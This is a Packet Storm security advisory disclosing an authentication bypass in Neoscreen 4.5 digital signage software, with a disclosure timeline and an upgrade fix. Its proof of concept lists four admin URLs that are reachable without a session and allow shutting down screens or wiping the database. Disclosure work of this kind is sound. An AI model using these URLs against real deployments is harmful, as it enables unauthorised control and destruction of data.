Neoscreen 4.5 Authentication Bypass

2016-07-25T00:00:00
ID PACKETSTORM:138029
Type packetstorm
Reporter Alex Haynes
Modified 2016-07-25T00:00:00

Description

                                        
                                            `Exploit Title: Neoscreen v4.5 Authentication bypass  
Product: Neoscreen by Cube Digital Media  
Vulnerable Versions: 4.5 and all previous versions  
Tested Version: 4.5  
Advisory Publication: July 24, 2016  
Vulnerability Type: Authentication Bypass Issues [CWE-592]  
CVE Reference: NONE  
Credit: Alex Haynes  
  
Advisory Details:  
  
  
(1) Vendor & Product Description  
--------------------------------  
  
Vendor:  
Cube Digital Media  
  
Product & Version:  
Neoscreen digital signage software v4.5  
  
Vendor URL & Download:  
http://www.cube-display.fr  
  
Product Description:  
"Neoscreen is an innovative, scalable and particularly powerful communication system. With just a few clicks, you can control all your dynamic display screens from your PC, wherever they may be in the world. "  
  
(2) Vulnerability Details:  
--------------------------  
Several URL's of the admin interface of the neoscreen software do not perform session checks correctly, thereby allowing authentication bypass and allowing any user to access admin functions.  
  
Proof of concept:  
Any of the following URL's will allow access to the admin interface os the Neoscreen software, to admin functions that (among other things) allow the user to shutdown the screen completely, or wipe the database.  
  
http://neoscreen/cubelocal/admin/shutdownMachine.asp  
http://neoscreen/cubelocal/admin/stabilityControl.asp  
http://neoscreen/cubelocal/modules/neoscreen/messages/basevide.asp  
http://neoscreen/cubelocal/classe/index.asp  
  
(3) Advisory Timeline:  
----------------------  
25/01/2016 - First Contact: vendor responds saying they are working on fix  
24/02/2016 - Follow up e-mail to request fix timeline. No vendor response.  
03/03/2016 - Follow up e-mail to request fix timeline.  
04/03/2016 - Vendor responds saying fix will be available 14/03/2016.  
  
  
(4)Solution:  
------------  
Upgrade to version 5 will fix this vulnerability.  
  
  
(5) Credits:  
------------  
Discovered by Alex Haynes  
`